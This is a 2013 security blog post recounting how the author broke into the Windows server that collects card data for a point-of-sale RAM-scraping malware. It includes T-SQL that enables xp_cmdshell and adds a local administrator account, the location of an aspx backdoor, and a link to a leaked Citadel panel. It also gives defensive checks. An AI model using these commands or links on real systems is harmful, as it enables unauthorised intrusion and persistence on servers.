Friday 1 February 2013

Petroleum POS malware?

Recently aaSSfxxx posted an interesting file on kernelmode: a POS malware loaded via Andromeda, according to him.
I've asked him to write something about it, so I won't explain here how this malware works; have a look at his write-up: http://aassfxxx.infos.st/article21/pos-malware-ram-scrapper

But like I told him in a comment... root the fucker!
The bad guys run a Windows server; Track 2 data is sent to it (or whatever it grabs; I haven't reversed the exe, so I don't know what is actually grabbed).
Have to thank him for the bad configuration that lets you enable xp_cmdshell (LOL).
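As an added example (not code from the original post or from aaSSfxxx's write-up), here is what the misconfiguration above boils down to in T-SQL: the check for whether xp_cmdshell is already on, the enable-and-add-a-user sequence this post relies on, the corrected setting, and the query for who holds sysadmin (the real root cause: a login that can flip this switch at all). The instance, the privileges of the login, the user name and the password are assumptions.

```sql
-- Added example, not from the original post: the xp_cmdshell path described
-- above, with the check and the corrected setting a defender wants.
-- Assumptions: SQL Server 2005+ (the loopback 1433 instance in the netstat
-- output), and a login that already holds sysadmin or the ALTER SETTINGS
-- server permission; that is the "bad configuration". User name and
-- password below are placeholders.

-- 1. Check: is xp_cmdshell enabled? value_in_use = 1 means yes.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. The weak state: what an over-privileged login can do, turn it on.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 3. OS commands then run as the SQL Server service account, e.g. adding a
--    local admin so RDP works afterwards ("added a user with xp_cmdshell").
EXEC master..xp_cmdshell 'net user examplesvc ExamplePassw0rd /add';
EXEC master..xp_cmdshell 'net localgroup administrators examplesvc /add';

-- 4. Corrected setting: disable it again and hide advanced options.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 5. Root cause: which logins are sysadmin (and could re-enable it).
SELECT sp.name, sp.type_desc
FROM sys.server_principals AS sp
JOIN sys.server_role_members AS rm ON rm.member_principal_id = sp.principal_id
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
WHERE r.name = 'sysadmin';
```

Disabling xp_cmdshell is only half of it: anyone in sysadmin can run step 2 again, so the query in step 5 is the one to act on (the web application's login should not be there), and the service account itself should not be a local administrator.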

aspx backdoor... can be downloaded from rootkit.net.cn/code/aspxspy2.rar
VT: 31/46

RDPwned:

Users:

No more IIS please

They even use cracked apps:

  Proto  Local Address          Foreign Address        State
  TCP    93.170.130.109:443     98:43166               ESTABLISHED
  TCP    93.170.130.109:56161   UBUNTU:microsoft-ds    ESTABLISHED
  TCP    93.170.130.109:56360   mail:60586             SYN_SENT
  TCP    127.0.0.1:1433         genuine:54808          ESTABLISHED
  TCP    127.0.0.1:1433         genuine:56348          TIME_WAIT
  TCP    127.0.0.1:54808        genuine:ms-sql-s       ESTABLISHED
  TCP    127.0.0.1:56349        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56350        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56351        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56352        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56353        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56354        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56355        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56356        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56357        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56358        genuine:ms-sql-s       TIME_WAIT

Stuff grabbed:
More than 600 strings inside.

Not related but also fun (cf: @MalwareScene):
INSERT INTO `bots` (`id`, `last_ip`, `last_online`, `new`, `version`, `traffic`, `command`, `regdate`) VALUES
('1', '84.22.122.6', 1299217483, 0, '8.0.0b', 1337, 'demo', '0000-00-00 00:00:00');

inetnum:        84.22.122.0 - 84.22.122.255
netname:        A84-22-122-0
descr:          REPUBLIC CYBERBUNKER INFRASTRUCTURE
role:           Ministery of Telecommunications
address:        One CyberBunker Avenue
address:        CB-31337
address:        CyberBunker-1

And finally... another idiot leaving stuff, including the latest panel of Citadel.
hxtp://monstercvv.cc/Citadel%201.3.5.1.zip

3 comments:

  1. How did you get the RDP access? Weak password?

  2. Added a user with xp_cmdshell

  3. Why index.php of citadel is empty?
